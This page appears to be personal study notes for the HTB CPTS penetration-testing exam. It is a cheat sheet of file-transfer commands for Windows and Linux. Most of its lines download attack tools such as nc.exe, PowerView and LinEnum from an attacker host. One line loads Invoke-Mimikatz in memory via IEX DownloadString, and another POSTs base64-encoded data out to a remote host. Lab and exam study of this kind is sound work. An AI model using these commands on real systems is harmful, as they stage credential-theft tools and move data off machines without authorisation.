HTB CPTS
  • Introduction
  • Getting Started
  • Initial Acces
    • Nmap
    • Services
    • Footprinting
    • Information Gathering - web edition
  • File Transfer
  • Shells & Payloads
  • Metasploit
  • Password Attacks
  • Pivoting
  • Ligolo-ng
  • Active Directory
  • Common Applications
  • Privilege Escalation
    • Linux Privesc
    • Window Privesc
  • Website
    • Web-Proxies
    • Fuff
    • Login Bruteforcing
    • SQL
    • SQLMap
    • XSS
    • File Inclusion
    • File Upload
    • Command Injection
    • Web Attacks
Powered by GitBook
On this page

File Transfer

Command

Description

Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1

Download a file with PowerShell

IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')

Execute a file in memory using PowerShell

Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

Upload a file with PowerShell

bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

Download a file using Bitsadmin

certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

Download a file using Certutil

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

Download a file using Wget

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Download a file using cURL

php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

Download a file using PHP

scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip

Upload a file using SCP

scp user@target:/tmp/mimikatz.exe C:\Temp\mimikatz.exe

Download a file using SCP

Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"

Invoke-WebRequest using a Chrome User Agent

PreviousInformation Gathering - web editionNextShells & Payloads

Last updated 1 year ago